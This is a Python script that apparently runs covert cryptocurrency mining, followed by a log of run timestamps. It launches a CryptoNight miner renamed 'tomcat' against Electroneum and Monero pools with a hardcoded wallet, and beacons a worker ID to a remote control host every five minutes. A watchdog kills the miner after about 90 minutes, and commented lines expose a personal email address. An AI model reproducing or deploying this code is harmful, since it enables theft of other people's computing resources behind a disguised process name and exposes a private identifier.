import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:25:01.793436
#2018-02-17 17:13:02.222992
#2018-02-17 19:01:03.974731
#2018-02-17 20:48:06.634805
#2018-02-17 22:35:07.381448
#2018-02-18 00:18:05.054143
#2018-02-18 02:09:04.224857
#2018-02-18 03:57:04.326464
#2018-02-18 05:44:06.258865
#2018-02-18 07:36:07.654123
#2018-02-18 09:23:04.741687
#2018-02-18 11:08:01.219022
#2018-02-18 12:55:04.968059
#2018-02-18 14:42:04.022716
#2018-02-18 16:31:05.062021
#2018-02-18 18:20:02.764582
#2018-02-18 20:06:01.985626
#2018-02-18 21:53:05.909347
#2018-02-18 23:43:03.538648
#2018-02-19 01:29:04.723700
#2018-02-19 03:17:07.023965
#2018-02-19 05:02:05.120595
#2018-02-19 06:48:07.577822
#2018-02-19 08:38:05.048595
#2018-02-19 10:27:06.037918
#2018-02-19 12:15:04.631756
#2018-02-19 14:02:01.604875
#2018-02-19 15:51:01.783170
#2018-02-19 17:38:07.831000
#2018-02-19 19:25:07.874152
#2018-02-19 21:11:07.612474
#2018-02-19 22:59:01.446406
#2018-02-20 00:42:06.642865
#2018-02-20 02:32:07.848587
#2018-02-20 04:22:01.395962
#2018-02-20 06:06:05.565809
#2018-02-20 07:51:06.429846
#2018-02-20 09:36:07.423278
#2018-02-20 11:21:01.358964
#2018-02-20 13:08:04.487863
#2018-02-20 14:53:08.570719
#2018-02-20 16:38:04.542164
#2018-02-20 18:25:01.323844
#2018-02-20 20:17:07.024708
#2018-02-20 22:03:03.812246
#2018-02-20 23:45:08.124478
#2018-02-21 01:28:08.161838
#2018-02-21 03:16:06.077678
#2018-02-21 05:03:06.431235
#2018-02-21 06:51:01.432807
#2018-02-21 08:36:08.669240
#2018-02-21 10:22:01.443920
#2018-02-21 12:09:07.400912
#2018-02-21 13:57:02.131889
#2018-02-21 15:41:09.091075
#2018-02-21 17:32:01.388324
#2018-02-21 19:18:13.197065
#2018-02-21 21:08:07.665512
#2018-02-21 22:55:08.342549
#2018-02-22 00:38:05.175678
#2018-02-22 02:25:03.896050
#2018-02-22 04:12:04.511969
#2018-02-22 05:57:04.557229
#2018-02-22 07:43:08.338483
#2018-02-22 09:32:08.135399
#2018-02-22 11:17:07.126173
#2018-02-22 13:03:01.805050
#2018-02-22 14:50:05.440183
#2018-02-22 16:36:06.191530
#2018-02-22 18:22:07.718954
#2018-02-22 20:16:07.256436
#2018-02-22 22:02:06.786853
#2018-02-22 23:48:09.130603
#2018-02-23 01:36:07.100407
#2018-02-23 03:22:06.459141
#2018-02-23 05:09:06.284703
#2018-02-23 06:53:06.507270
#2018-02-23 08:43:07.041786
#2018-02-23 10:59:09.377234
#2018-02-23 12:54:05.613891
#2018-02-23 14:38:05.387593
#2018-02-23 16:27:04.776363
#2018-02-23 18:13:08.079091
#2018-02-23 19:59:08.543610
#2018-02-23 21:42:07.628723
#2018-02-23 23:34:05.349588
#2018-02-24 01:22:06.087260
#2018-02-24 03:12:04.619736
#2018-02-24 04:57:07.442418
#2018-02-24 06:44:07.408370
#2018-02-24 08:39:03.973388
#2018-02-24 10:23:04.889164
#2018-02-24 12:19:01.681586
#2018-02-24 14:10:01.624594
#2018-02-24 15:57:02.117205
#2018-02-24 17:51:06.559373
#2018-02-24 19:38:03.227129
#2018-02-24 21:25:05.984612
#2018-02-25 00:07:01.427291
#2018-02-25 03:20:01.385489
#2018-02-25 06:52:04.610257